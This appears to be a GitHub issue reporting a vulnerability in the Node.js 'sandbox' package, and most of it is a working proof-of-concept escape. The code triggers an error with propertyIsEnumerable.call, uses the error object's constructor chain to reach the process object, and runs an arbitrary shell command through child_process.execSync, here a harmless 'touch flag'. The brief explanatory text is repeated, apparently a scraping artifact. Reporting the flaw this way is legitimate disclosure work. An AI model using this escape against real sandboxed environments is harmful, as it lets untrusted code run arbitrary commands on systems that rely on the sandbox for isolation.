Open seongil-wi opened 1 year ago
var Sandbox = require("sandbox") var code = ` try{ propertyIsEnumerable.call(undefined,); } catch (pp) { pp.constructor.constructor('return process')().mainModule.require('child_process').execSync('touch flag'); } ` s = new Sandbox() s.run(code)
Sandbox can be escaped by calling propertyIsEnumerable.call function. Also, we can execute arbitrary shell code using process module.
propertyIsEnumerable.call
Sandbox can be escaped by calling
propertyIsEnumerable.callfunction. Also, we can execute arbitrary shell code using process module.